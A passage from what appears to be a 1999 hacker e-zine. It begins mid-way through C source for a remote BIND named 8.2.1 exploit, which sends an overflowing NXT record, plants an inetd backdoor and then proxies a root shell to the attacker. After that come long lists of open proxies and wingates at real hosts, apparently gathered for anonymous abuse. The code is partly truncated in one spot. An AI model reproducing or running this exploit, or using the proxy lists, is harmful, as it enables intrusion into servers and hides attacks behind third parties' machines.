0xefbfbb00, 7000}, {7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1, 0xefbfbb00, 7000}, {0, 0, 0, 0} }; int arch=0; char *command=0; /* these two dns routines from dspoof/jizz */ /* pull out a compressed query name */ char *dnssprintflabel(char *s, char *buf, char *p) { unsigned short i,len; char *b=NULL; len=(unsigned short)*(p++); while (len) { while (len >= 0xC0) { if (!b) b=p+1; p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000); len=(unsigned short)*(p++); } for (i=0;i>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob "); b=(unsigned long*)(a+4166); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i5 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o0 - significant *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o6 - significant *b++=htonl(archlist[arch].ret); //o7 - retaddr } } int form_response(HEADER *packet, char *buf) { char query[512]; int qtype; HEADER *dnsh; char *p; char *walker; memset(buf,0,sizeof(buf)); dnsh = (HEADER *) buf; dnsh->id = packet->id; dnsh->qr=1; dnsh->aa=1; dnsh->qdcount = htons(1); dnsh->ancount = htons(1); dnsh->arcount = htons(1); dnsh->rcode = 0; walker=(char*)(dnsh+1); p=dnssprintflabel(query, (char *)packet, (char*)(packet+1)); query[strlen(query) - 1] = 0; qtype=*((unsigned short *)p); printf("%s type=%d\n",query, ntohs(qtype)); /* first, the query */ walker=dnsaddlabel(walker, query); PUTSHORT(ntohs(qtype), walker); //PUTSHORT(htons(T_PTR), walker); PUTSHORT(1,walker); /* then, our answer */ /* query IN A 1.2.3.4 */ walker=dnsaddlabel(walker, query); PUTSHORT(T_A, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); PUTSHORT(4, walker); sprintf(walker,"%c%c%c%c",1,2,3,4); walker+=4; /* finally, we make named do something more interesting */ walker=dnsaddlabel(walker, query); PUTSHORT(T_NXT, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); /* the length of one label and our arbitrary data */ PUTSHORT(archlist[arch].length+7, walker); PUTSHORT(6, walker); sprintf(walker,"admadm"); walker+=6; PUTSHORT(0, walker); make_overflow(walker); walker+=archlist[arch].length; PUTSHORT(0, walker); return walker-buf; } #define max(x,y) ((x)>(y)?(x):(y)) int proxyloop(int s) { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; sleep(1); printf("Entering proxyloop..\n"); strcpy(snd, "cd /; uname -a; pwd; id;\n"); write(s, snd, strlen(snd)); for (;;) { FD_SET(fileno(stdin), &rset); FD_SET(s, &rset); maxfd = max(fileno(stdin), s) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd) - 2, stdin); write(s, snd, strlen(snd)); } if (FD_ISSET(s, &rset)) { bzero(rcv, sizeof(rcv)); if ((n = read(s, rcv, sizeof(rcv))) == 0) exit(0); if (n < 0) { return -3; } fputs(rcv, stdout); } } return 0; } int main(int argc, char **argv) { int s, fromlen, res, sl, s2; struct sockaddr_in sa, from, to; char buf[16384]; char sendbuf[16384]; unsigned short ts; int i; if (argc<2) { fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]); fprintf(stderr,"Available architectures:\n"); i=-1; while(archlist[++i].id) fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name); exit(1); } arch=atoi(argv[1])-1; if (argc==3) command=argv[2]; if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1) { perror("socket"); exit(1); } bzero(&sa, sizeof sa); sa.sin_family=AF_INET; sa.sin_addr.s_addr=INADDR_ANY; sa.sin_port=htons(53); if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1) { perror("bind"); exit(1); } do { fromlen=sizeof(from); if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from, &fromlen)) == -1) { perror("recvfrom"); exit(1); } printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr), ntohs(from.sin_port)); sl=form_response((HEADER *)buf,sendbuf); /* now lets connect to the nameserver */ bzero(&to, sizeof(to)); to.sin_family=AF_INET; to.sin_addr=from.sin_addr; to.sin_port=htons(53); if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1) { perror("socket"); exit(1); } if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1) { perror("connect"); exit(1); } ts=htons(sl); write(s2,&ts,2); write(s2,sendbuf,sl); if (archlist[arch].safe>1) close(s2); } while (archlist[arch].safe>1); /* infinite loop for sparc */ proxyloop(s2); exit(1); } @HWA 54.0 Current snapshot of the CYBERARMY lists. Proxies, etc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Check these lists and see if YOUR box is listed here as it can be abused by malicious crackers and net miscreants to wreak havoc and spam networks. - Ed [ Proxies: ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ proxy1.emirates.net.ae port 8080 [latency: 11/17/99 16:27:53 EST by coolio] i.am.31337.nu port 31337 [latency: 11/17/99 12:29:57 EST by Elite.] 138.25.8.1 port 80 [latency: 11/16/99 00:30:03 EST by ThA LasT Don] 138.25.8.9 port 80 [latency: 11/16/99 00:29:31 EST by ThA LasT Don] proxy.elender.hu port 3128 [latency: 11/15/99 10:23:10 EST] proxy.prodigy.net port 8080 [latency: 11/14/99 20:31:02 EST by ladeda] 212.119.32.2 port 1080 [latency: 11/14/99 13:33:09 EST by GooD_LooKing_Boy] 151.198.20.153 port 1080 [latency: 11/14/99 13:30:53 EST by GooD_LooKing_Boy] 151.198.24.19 port 3128 [latency: 11/14/99 09:22:25 EST by ALiEN] 205.151.225.202 port 80 [latency: 11/14/99 02:10:41 EST by scYthe] tntport0945.cwjamaica.com port 21 [latency: 11/13/99 20:17:23 EST] proxy.shabakah.net.sa port 80 [latency: 11/13/99 11:05:49 EST by shabak] proxy.sol.net.sa port 8080 [latency: 11/13/99 08:02:26 EST by aaa] inet.com.pk port 8080 [latency: 11/12/99 15:10:11 EST by zahid] sinkross.san.ru port 80 [latency: 11/12/99 13:47:34 EST by T_Rex] 202.54.6.20 port 3318 [latency: 11/12/99 12:42:12 EST by gauri_ps] proxy.gocis.bg (195.138.133.18) port 3128 [latency: 11/12/99 12:09:32 EST by Tribal] proxy.gocis.bg (195.138.133.18) port 3128 [latency: 11/12/99 12:06:25 EST by Tribal] proxy.dade.k12.fl.us port 80 [latency: 11/12/99 10:26:37 EST] 204.81.0.20 port 80 [latency: 11/12/99 10:06:47 EST] 151.198.24.19 port 3128 [latency: 11/12/99 07:12:47 EST] 151.198.19.116 port 1080 [latency: 11/12/99 07:10:53 EST] 151.198.18.245 port 80 [latency: 11/12/99 07:10:07 EST by T_Rex] proxy.pacific.net.sg port 8080 [latency: 11/12/99 02:54:15 EST] 205.237.52.61 port 80 [latency: 11/11/99 23:13:48 EST by T_Rex] 195.98.37.11 port 1080 [latency: 11/11/99 23:04:52 EST by T_Rex] ww-pa01.proxy.aol.com port 80 [latency: 11/11/99 21:15:33 EST] server.goway.com port 1080 [latency: 11/11/99 19:06:47 EST by fusion] cache.btinternet.com port 8080 [latency: 11/11/99 15:44:11 EST by DiGiTaL DeMoN] proxy1.brunet.bn port 8080 [latency: 11/11/99 13:23:30 EST by VivrÄnt HÄcker] 210.154.98.61 port 1080 [latency: 11/11/99 05:42:18 EST] emirates.net.ae port 8080 [latency: 11/11/99 02:43:27 EST by slayer] prx7.vic.schools.net.au port 3128 [latency: 11/10/99 23:13:56 EST by Xpy] proxy.kyit.edu.tw port 3128 [latency: 11/10/99 21:24:04 EST] fuckyou.com port 3169 [latency: 11/10/99 20:24:34 EST] spaceproxy.com port 80 [latency: 11/10/99 20:04:59 EST] proxy.dmp.net.sa port 8080 [latency: 11/10/99 18:14:30 EST] hotmail.com port 80 [latency: 11/10/99 18:10:25 EST] 24.4.29.247 port 1080 [latency: 11/10/99 14:45:46 EST] 1Cust92.tnt2.eugene.or.da.uu.net port 7000 [latency: 11/10/99 10:01:42 EST] proxy.icc.net.sa port 8080 [latency: 11/10/99 09:59:58 EST by xodiac] proxy.prodigy.net port 8080 [latency: 11/10/99 05:57:39 EST] 205.151.225.201 port 80 [latency: 11/09/99 22:22:06 EST by ThA LasT Don] 205.151.225.202 port 80 [latency: 11/09/99 22:21:48 EST by ThA LasT Don] 207.34.202.2 port 80 [latency: 11/09/99 22:20:07 EST by ThA LasT Don] proxy.prodigy.net port 8080 [latency: 11/09/99 21:27:49 EST] proxy.marin.k12.ca.us port 80 [latency: 11/09/99 18:28:48 EST by Nuno Ricardo] server.goway.com port 1080 [latency: 11/09/99 16:06:35 EST by BM-Freak] 202.21.14.234 port 1080,80 [latency: 11/09/99 15:22:08 EST by T_Rex] proxy.easynet.co.uk port 3128 [latency: 11/08/99 21:56:37 EST by uanyong] proxy.easynet.co.uk port 3128 [latency: 11/08/99 17:18:41 EST] proxy1.emirates.net.ae port 8080 [latency: 11/08/99 17:17:26 EST by farrukh] gw1.ksu.edu.sa port 80 [latency: 11/08/99 02:23:41 EST] proxy.cat.net.th port 8080 [latency: 11/08/99 01:10:06 EST by KrypticF-] proxy.spnet.net port 3428 [latency: 11/08/99 01:07:57 EST by RadaR] hotmail.com port 80 [latency: 11/08/99 00:59:41 EST by ttt] proxy.tiscalinet.it port 3128 [latency: 11/07/99 21:04:30 EST by Giacomo Giorgi] 205.188.160.121 port AOL [latency: 11/07/99 18:49:30 EST by Xmenddddd] sabelaout.saix.net port 8080 [latency: 11/07/99 17:04:04 EST by Chawwa] 24.4.29.247 port 1080 [latency: 11/07/99 15:51:50 EST] sabelaout.saix.net port 8080 [latency: 11/07/99 13:52:17 EST] 194.143.243.244 port 35727 [latency: 11/07/99 12:41:52 EST] proxy1.ae.net.sa port 8080 [latency: 11/07/99 11:35:49 EST by man] proxy.vtx.ch port 8080 [latency: 11/07/99 11:20:05 EST by bastard] 212.26.19.169 port 8080 [latency: 11/07/99 06:23:22 EST by namer] 1Cust92.tnt2.eugene.or.da.uu.net port 7000 [latency: 11/06/99 16:03:53 EST by ircproxy] dinmamma.com port 8080 [latency: 11/06/99 14:42:29 EST] proxy.cadvision.com port 8080 [latency: 11/06/99 13:18:08 EST by Wingaman] 205.151.225.202 port 80 [latency: 11/06/99 10:03:05 EST by ThA LasT Don] proxy.xmission.com port 8080 [latency: 11/06/99 04:24:21 EST by #r00t/sh4d0w] proxyd.emirates.net.ae port 194.170. [latency: 11/06/99 03:19:22 EST] proxy.elender.hu port 3128 [latency: 11/06/99 01:22:42 EST by sex] 205.151.225.201 port 80 [latency: 11/06/99 00:08:34 EST by sexy] gw1.ksu.edu.sa port 80 [latency: 11/06/99 00:06:52 EST by sexy_girl] 203.108.0.58 port 80 [latency: 11/05/99 23:49:57 EST] bess-proxy.ncocc.ohio.gov port 8972 [latency: 11/05/99 00:58:23 EST] 194.143.243.244 port 35727 [latency: 11/04/99 18:44:01 EST by Joe Black77] bess-proxy.ncocc.ohio.gov port 8972 [latency: 11/04/99 16:42:54 EST] dakar-35.interware.hu port 81 [latency: 11/04/99 06:49:04 EST by DEALER] zip-translator.dna.affrc.go.jp port 30001 [latency: 11/04/99 03:36:27 EST] andele.cs.tu-berlin.de port 80 [latency: 11/03/99 18:31:55 EST] austra6.lnk.telstra.net port 8080 [latency: 11/03/99 18:30:14 EST] proxy.elender.hu port 3128 [latency: 11/03/99 16:57:37 EST by fogman] 192.54.193.137 port 8080 [latency: 11/03/99 10:53:23 EST] 203.140.129.10 port 8080 [latency: 11/03/99 08:42:16 EST by neron] fuckyou.com port 3169 [latency: 11/02/99 20:34:19 EST by huhu] proxy.elender.hu port port 3128 [latency: 11/02/99 18:08:53 EST] proxy.marin.k12.ca.us port 80 [latency: 11/02/99 16:54:05 EST by mnc] proxy.iitk.ac.in port 1080 [latency: 11/02/99 15:11:26 EST] aol.com port 8080 [latency: 11/02/99 05:49:12 EST by 80] proxy.prodigy.net port 8080 [latency: 11/02/99 05:47:49 EST by 8080] j56.lbn.jaring.my port 80 [latency: 11/02/99 05:44:56 EST by 80] proxy.inea.net.ar port 80 [latency: 11/02/99 02:25:46 EST by The Desconocido] proxy.fibertel.com.ar port 80 [latency: 11/02/99 02:22:48 EST by The Desconocido] andele.cs.tu-berlin.de port 80 [latency: 11/02/99 01:52:54 EST] sps.net.sa port 8080 [latency: 11/02/99 01:19:24 EST] hymn.iinet.net.au (203.59.24.165 port 1080 [latency: 11/01/99 07:40:53 EST] info.fh-konstanz.de port 81 [latency: 10/31/99 18:58:41 EST by ghg] gw1.ksu.edu.sa port 80 [latency: 10/31/99 15:04:12 EST] proxy1.emirates.net.ae port 8080 [latency: 10/31/99 14:51:02 EST by wajahat] bess-proxy.ncocc.ohio.gov port 8972 [latency: 10/31/99 12:52:28 EST] proxy.bih.net.ba port 8080 [latency: 10/31/99 11:42:46 EST by Gorazdak] 24.4.29.247 port 1080 [latency: 10/31/99 03:12:56 EST by [NuT]] cache.csi.com.ph port 3128 [latency: 10/30/99 21:43:49 EDT by Violet] proxy.elender.hu port 3128 [latency: 10/30/99 18:52:36 EDT] 4.18.141.3 port 3128 [latency: 10/30/99 13:44:48 EDT by juninhO] 212.26.18.21 45975 port 45975 [latency: 10/30/99 05:40:29 EDT] dakar-35.interware.hu port 81 [latency: 10/29/99 18:41:27 EDT by McMester] 195.56.12.254 port 3128 [latency: 10/29/99 17:14:30 EDT] andele.cs.tu-berlin.de port 80 [latency: 10/29/99 17:10:01 EDT by sam] 200.21.200.38 port 8080 [latency: 10/29/99 10:07:58 EDT by juninhO] strontia3.harza.com port 80 [latency: 10/29/99 10:04:39 EDT by juninhO] iol.it port 8080 [latency: 10/29/99 10:01:25 EDT by juninho] 199.203.4.5 port 80 [latency: 10/29/99 05:55:44 EDT by Uriah||Heep_] proxy.lasipalatsi.fi port 8080 [latency: 10/29/99 02:35:19 EDT by Tse] proxy.sinectis.com.ar port 80 [latency: 10/28/99 10:10:01 EDT by DrAkE] 203.20.76.4 port 8080 [latency: 10/28/99 05:12:23 EDT by moha] dinmamma.com port 8080 [latency: 10/28/99 04:43:48 EDT by néron] ftp.agozar.com port 12345 [latency: 10/27/99 21:18:32 EDT] sea.plugcom.ru port 80 [latency: 10/27/99 19:37:11 EDT by Tosik] cache.dux.ru port 80 [latency: 10/27/99 19:36:33 EDT by Tosik] 203.108.0.56 port 80 [latency: 10/27/99 16:26:46 EDT by bio-e->] gw1.ksu.edu.sa port 80 [latency: 10/27/99 13:32:26 EDT by Zorro Guy] 202.160.12.31 port 80 [latency: 10/27/99 08:23:51 EDT by aCee] 203.16.61.104 port 25 [latency: 10/27/99 05:02:58 EDT by johne@ (Fuck U!)] info.fh-konstanz.de port 81 [latency: 10/26/99 12:07:36 EDT by essam] lpwa.com port 8000 [latency: 10/26/99 09:47:29 EDT] 193.219.28.134 port 8080 [latency: 10/26/99 05:09:20 EDT] cache.bt.net port 3128 [latency: 10/25/99 15:06:57 EDT] 205.237.246.45 port 3128 [latency: 10/25/99 14:21:48 EDT by Two`KooL] dinmamma.com port 8080 [latency: 10/25/99 05:39:10 EDT by minmamma] onion-router.nrl.navy.mil port 9200 [latency: 10/25/99 03:11:40 EDT by l4m3r] 206.138.230.239 port 6667 [latency: 10/25/99 01:16:49 EDT by Dolban] 200.49.32.141 port 1408 [latency: 10/25/99 00:02:12 EDT by PZIP] proxy4.emirates.net.ae port 8080 [latency: 10/24/99 19:56:50 EDT by fuck to etesalat] proxy.anet.net.sa port 8080 [latency: 10/24/99 17:19:54 EDT by aldasher] 195.92.194.42 port 80 [latency: 10/24/99 12:33:32 EDT by Peter] 210.145.146.146 port 8080 [latency: 10/23/99 23:09:41 EDT by cowhead2000] 203.140.129.10 port 8080 [latency: 10/23/99 23:08:18 EDT by cowhead2000] dakar-35.interware.hu port 81 [latency: 10/23/99 19:14:27 EDT by Dyne] proxy.ozemail.com.au port 8080 [latency: 10/23/99 13:33:09 EDT] 194.182.97.2 port 80 [latency: 10/23/99 13:29:28 EDT by jim] lpwa.com port 8000 [latency: 10/23/99 09:20:35 EDT by FrEaKeD -=undernet=-] 210.154.98.61 port 1080 [latency: 10/23/99 08:53:55 EDT] 210.154.98.61 port 1080 [latency: 10/23/99 01:42:21 EDT by Dormidon] 204.81.0.20 port 80 [latency: 10/22/99 21:53:41 EDT] hamster.slip.net port 8080 [latency: 10/22/99 20:05:09 EDT by m0loch] [ Wingates ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ebrahim.cjb.net [latency: 11/17/99 15:22:48 EST by tissetass] ppp23-davao.mozcom.com [latency: 11/17/99 15:22:04 EST by tiss] dns.gincorp.co.jp [latency: 11/17/99 15:21:08 EST by tissetass] kodama.rs-eng.co.jp [latency: 11/17/99 15:19:21 EST by tissetass] irc.ro.org [latency: 11/17/99 14:23:01 EST by little_devil] kryptocrew.de [latency: 11/17/99 14:21:32 EST by little_devil] rayoflight.net [latency: 11/17/99 14:20:15 EST by little_devil] razer.base.org [latency: 11/17/99 14:19:21 EST by little_devil] dramanetclub.gr [latency: 11/17/99 14:18:50 EST by little_devil] cecchetto.it [latency: 11/17/99 14:18:12 EST by little_devil] ircko.webjump.com [latency: 11/17/99 14:15:36 EST by little_devil] mystic.oltenia.ro [latency: 11/17/99 14:14:21 EST by little_devil] ppp-21-124-87.libero.it [latency: 11/17/99 14:10:58 EST by little_devil] 161.142.104.145 [latency: 11/16/99 21:56:34 EST by Tok_Gajah] fernwo.lnk.telstra.net [latency: 11/16/99 20:40:27 EST by sandoc] austco1.lnk.telstra.net [latency: 11/16/99 20:38:46 EST by sandoc] ppp1.mohammadia.mtds.com [latency: 11/16/99 18:27:56 EST by sandoc] proxy.sol.com.br [latency: 11/16/99 18:13:04 EST by sandoc] brutt.dsl.xmission.com [latency: 11/16/99 17:50:09 EST by sandoc] d103.as0.clev.oh.voyager.net [latency: 11/16/99 17:34:29 EST by sandoc] 165-246.tr.cgocable.ca [latency: 11/16/99 17:30:53 EST by sandoc] modem-as112-143.netone.com.tr [latency: 11/16/99 17:20:37 EST by sandoc] firewall.lc.cc.il.us [latency: 11/16/99 17:17:08 EST by sandoc] merida0202.infosel.net.mx [latency: 11/16/99 16:57:47 EST by sandoc] 62.82.236.75 [latency: 11/16/99 08:50:25 EST by dugloo] 161.142.104.234 [latency: 11/16/99 08:41:00 EST by dugloo] 142.165.136.90 [latency: 11/16/99 08:38:31 EST by dugloo] carver.ocs.k12.al.us [latency: 11/16/99 05:26:51 EST by dugloo] j51.kch16.jaring.my [latency: 11/16/99 05:08:53 EST by dugloo] ns.uss.br [latency: 11/16/99 05:08:02 EST by dugloo] j40.kgr.jaring.my [latency: 11/16/99 05:05:44 EST by dugloo] ns1.mitsubishi-seibi.ac.jp [latency: 11/16/99 04:57:18 EST by dugloo] pd128.katowice.ppp.tpnet.pl [latency: 11/16/99 04:55:19 EST by dugloo] altona.lnk.telstra.net [latency: 11/16/99 04:54:59 EST by dugloo] Reims-10-108.abo.wanadoo.fr [latency: 11/16/99 04:54:23 EST by dugloo] mail.tbccorp.com [latency: 11/16/99 04:50:19 EST by dugloo] mail.wingsink.com [latency: 11/16/99 04:47:08 EST by dugloo] ppp07-cab.mozcom.com [latency: 11/16/99 04:45:08 EST by dugloo] server.arthouse.ie [latency: 11/16/99 04:42:33 EST by dugloo] ppp-128-144.terra.net.lb [latency: 11/16/99 04:40:56 EST by dugloo] hoydalar.fo [latency: 11/16/99 04:38:09 EST by dugloo] PPP-188-163.bng.vsnl.net.in [latency: 11/16/99 04:35:20 EST by dugloo] dajenkin.ozemail.com.au [latency: 11/16/99 04:31:30 EST by dugloo] ns.elaso.cz [latency: 11/16/99 04:19:41 EST by dugloo] tb-249.compass.com.ph [latency: 11/16/99 04:18:33 EST by dugloo] j53.mlk32.jaring.my [latency: 11/16/99 04:17:37 EST by dugloo] l2tp-178.awalnet.net.sa [latency: 11/16/99 04:15:39 EST by dugloo] 202.58.254.124 [latency: 11/16/99 04:14:45 EST by dugloo] mometal.com [latency: 11/16/99 04:14:01 EST by dugloo] austra6.lnk.telstra.net [latency: 11/16/99 04:13:25 EST by dugloo] ppp23-davao.mozcom.com [latency: 11/16/99 04:10:10 EST by dugloo] asy28.as02.bak1.superonline.com [latency: 11/16/99 04:08:14 EST by dugloo] j4.bkj23.jaring.my [latency: 11/16/99 04:07:04 EST by dugloo] mail1.bikesusa.com [latency: 11/16/99 04:05:05 EST by dugloo] ns.uss.br [latency: 11/16/99 04:04:06 EST by dugloo] bioserver3.biohard.com.br [latency: 11/16/99 04:03:25 EST by dugloo] ccps.calhoun.k12.sc.us [latency: 11/16/99 04:02:44 EST by dugloo] oirsa.org.gt [latency: 11/16/99 03:59:53 EST by dugloo] calnet13-47.gtecablemodem.com [latency: 11/16/99 03:58:50 EST by dugloo] ppp5006.kems.net [latency: 11/16/99 03:39:54 EST by dugloo] ppp25-davao.mozcom.com [latency: 11/16/99 03:37:21 EST by dugloo] ppp00-lucena.mozcom.com [latency: 11/16/99 03:34:00 EST by dugloo] 202.58.254.131 [latency: 11/16/99 03:32:56 EST by dugloo] ip1-79.mindgate.net [latency: 11/16/99 03:18:42 EST by dugloo] ftp.cdrom.com [latency: 11/15/99 22:06:32 EST] 209.112.31.34 [latency: 11/15/99 17:48:36 EST by Rsnake The Bharwa] mirror.silmarill.ru [latency: 11/15/99 17:33:16 EST by sandoc] asy34.as01.mat1.superonline.com [latency: 11/15/99 17:27:39 EST by sandoc] 98.203.226.209.in-addr.arpa [latency: 11/15/99 05:41:07 EST by Xtian] isdn5.pppmad.vsnl.net.in [latency: 11/15/99 05:14:52 EST by dugloo] sja-181-45.tm.net.my [latency: 11/15/99 04:31:06 EST by dugloo] tob24399-1.gw.connect.com.au [latency: 11/15/99 04:07:35 EST by dugloo] rub084.pv00.lo.interbusiness.it [latency: 11/15/99 03:45:06 EST by dugloo] 206.191.93.67 [latency: 11/14/99 23:56:49 EST by fsdfdsf] reggae-08-33.nv.iinet.net.au [latency: 11/14/99 17:56:58 EST] shit.com [latency: 11/14/99 15:58:46 EST] lpwa.com [latency: 11/13/99 21:13:47 EST by www.aol.com/net] ns.elaso.cz [latency: 11/13/99 16:11:59 EST by HC_SMD Hacker_Club] 206.191.93.67 [latency: 11/13/99 02:45:22 EST] 195.98.37.11 [latency: 11/11/99 22:59:57 EST by T_Rex_] ip108.tacoma17.wa.pub-ip.psi.net [latency: 11/11/99 19:29:04 EST] old-micolp236.ambs.lasierra.edu [latency: 11/11/99 19:28:29 EST] mail.unitedsd.net [latency: 11/11/99 17:43:20 EST by sandoc] ad118-128.magix.com.sg [latency: 11/11/99 17:36:13 EST by sandoc] pelican.city.unisa.edu.au [latency: 11/11/99 17:22:32 EST by uneek-] rigel.barralink.com.br [latency: 11/11/99 17:21:59 EST by sandoc] dns.tssh.co.jp [latency: 11/11/99 17:14:49 EST by sandoc] secure.yunque.net [latency: 11/11/99 17:10:42 EST by sandoc] mail.medikona.lt [latency: 11/11/99 17:07:22 EST by sandoc] ntserver01.thomastonschools.org [latency: 11/11/99 17:01:55 EST by sandoc] dns1.caps.co.jp [latency: 11/11/99 16:59:34 EST by sandoc] oirsa.org.gt [latency: 11/11/99 16:37:24 EST by sandoc] hawaii.rr.com [latency: 11/11/99 15:15:10 EST] MonsterOwnzYou.com [latency: 11/11/99 13:49:08 EST by GOTO-IT!] reggae-08-33.nv.iinet.net.au [latency: 11/11/99 04:49:24 EST] ebrahim.cjb.net [latency: 11/10/99 12:54:10 EST by RSnake] bugtiz.com [latency: 11/10/99 12:52:30 EST by II] cpu1555.adsl.bellglobal.com [latency: 11/10/99 12:26:34 EST by Xtian] interamerica.com.do [latency: 11/10/99 12:25:27 EST by Xtian] liquid.cc [latency: 11/10/99 08:11:45 EST] dizasta.net [latency: 11/10/99 04:05:42 EST by h4ck3d by RSnakE^] rattle-snake.org [latency: 11/10/99 04:05:08 EST by RSnake] alishba.com [latency: 11/10/99 03:55:38 EST by RSnake] 212.27.202.68 [latency: 11/09/99 15:28:06 EST by T_Rex] 202.21.14.234 [latency: 11/09/99 15:23:43 EST] server.hirup.khmelnitskiy.ua [latency: 11/09/99 04:16:07 EST by frank] 202.155.3.167 [latency: 11/09/99 01:38:55 EST by Tok_Gajah] 202.155.3.187 [latency: 11/09/99 01:38:00 EST by Tok_Gajah] shit.com [latency: 11/08/99 14:59:14 EST] nilko.com [latency: 11/08/99 13:23:59 EST] 152.201.146 [latency: 11/08/99 10:45:42 EST by tester] pbarray05.powerup.com.au [latency: 11/08/99 08:34:34 EST by idu] proxy.alphanet.ro [latency: 11/07/99 22:09:35 EST by dic cerbu] 152.201.146.7 [latency: 11/07/99 07:06:28 EST] morechat.talkcity.com [latency: 11/07/99 07:05:47 EST] 98C99207.ipt.aol.com [latency: 11/07/99 07:05:26 EST] cia.net [latency: 11/07/99 05:00:47 EST by Hammer] cia.net [latency: 11/06/99 20:40:50 EST by Doktor Joint] 209.161.42.1 [latency: 11/06/99 19:56:14 EST] 1Cust92.tnt2.eugene.or.da.uu.net [latency: 11/06/99 16:05:27 EST by irc] altona.lnk.telstra.net [latency: 11/06/99 15:12:52 EST by initd_] mipox.vip.best.com [latency: 11/06/99 15:12:35 EST by initd_] 24.66.10.215.on.wave.home.com [latency: 11/06/99 15:12:16 EST by initd_] wdpcbalt.wdpc.com [latency: 11/06/99 15:11:59 EST by initd_] kodama.rs-eng.co.jp [latency: 11/06/99 15:11:31 EST by initd_] cs9341-60.austin.rr.com [latency: 11/06/99 15:10:40 EST by initd_] rip034.wesnet.com [latency: 11/06/99 15:10:11 EST by initd_] d212-151-34-247.swipnet.se [latency: 11/06/99 15:09:48 EST by initd_] burnem.lnk.telstra.net [latency: 11/06/99 15:09:27 EST by initd_] j19.jhb31.jaring.my [latency: 11/06/99 15:09:01 EST by initd_] 212-133-161-60.sbs.net.tr [latency: 11/06/99 15:08:41 EST by initd_] portable.static.star.net.nz [latency: 11/06/99 15:08:22 EST by initd_] Mulhouse-8-85.abo.wanadoo.fr [latency: 11/06/99 15:08:05 EST by initd_] 165-246.tr.cgocable.ca [latency: 11/06/99 15:07:41 EST by initd_] dt027nd2.san.rr.com [latency: 11/06/99 14:55:27 EST by RSnake] 200.45.32.71 [latency: 11/06/99 14:52:30 EST by RSnake] 193.231.207.84 [latency: 11/06/99 14:51:50 EST by RSnake] 216.209.195.128 [latency: 11/06/99 14:51:21 EST by RSnake] 139.130.80.123 [latency: 11/06/99 14:50:35 EST by RSnake] 208.222.211.65 [latency: 11/06/99 14:50:07 EST by RSnake] ivrit.co.il [latency: 11/06/99 13:52:24 EST by Slamat] 207.25.216.56 [latency: 11/06/99 13:48:27 EST by invisibleman] saward.lnk.telstra.net [latency: 11/05/99 17:42:18 EST by sandoc] 202.54.47.67 [latency: 11/05/99 17:34:51 EST by spacejoe] d212-151-105-250.swipnet.se [latency: 11/05/99 17:33:12 EST by sandoc] icqtwsrv1.maiowoo.com [latency: 11/05/99 17:29:40 EST by sandoc] mail.ceinstruments.it [latency: 11/05/99 17:20:45 EST by sandoc] ns0-gw.nsjnet.co.jp [latency: 11/05/99 17:19:28 EST by sandoc] ken9029.tsukuba.accs.or.jp [latency: 11/05/99 17:15:16 EST by sandoc] msproxy.datacom.bg [latency: 11/05/99 17:13:01 EST by sandoc] 8-22.dialup.surnet.ru [latency: 11/05/99 17:11:08 EST by sandoc] mail.trutnov.cz [latency: 11/05/99 16:44:43 EST by sandoc] asshole.com [latency: 11/05/99 12:02:35 EST by dd] 202.21.8.31 [latency: 11/05/99 04:44:17 EST by hola] 210.170.93.66 [latency: 11/04/99 23:17:03 EST] Nine-Inch-Nails.Com [latency: 11/04/99 21:49:10 EST by john] 24.200.21.118 [latency: 11/04/99 17:02:11 EST by initd_] l2tp-178.awalnet.net.sa [latency: 11/04/99 17:01:26 EST by initd_] host13.av-el.co.il [latency: 11/04/99 16:59:54 EST by initd_] 216.72.47.70 [latency: 11/04/99 16:59:21 EST by initd_] server.hirup.khmelnitskiy.ua [latency: 11/04/99 16:56:54 EST by initd_] 195.46.19.68 [latency: 11/04/99 16:54:56 EST by initd_] 24.200.89.3 [latency: 11/04/99 16:52:31 EST by initd_] edtn002050.hs.telusplanet.net [latency: 11/04/99 16:51:29 EST by initd_] dsl-148-146.tstonramp.com [latency: 11/04/99 16:50:13 EST by initd_] 200.33.131.186 [latency: 11/04/99 16:49:27 EST by initd_] mipox.vip.best.com [latency: 11/04/99 16:48:44 EST by initd_] mp-217-242-213.daxnet.no [latency: 11/04/99 16:48:02 EST by initd_] sun-170-233.sunwave.net [latency: 11/04/99 16:47:23 EST by initd_] 24.200.17.163 [latency: 11/04/99 16:46:53 EST by initd_] cor-050-b4.codetel.net.do [latency: 11/04/99 16:46:07 EST by initd_] por539.esoterica.pt [latency: 11/04/99 16:45:53 EST by initd_] 208.14.2.179 [latency: 11/04/99 16:44:37 EST by initd_] ppp54-182.hh.tigernet.de [latency: 11/04/99 16:43:43 EST by initd_] 216.226.237.86 [latency: 11/04/99 16:41:38 EST 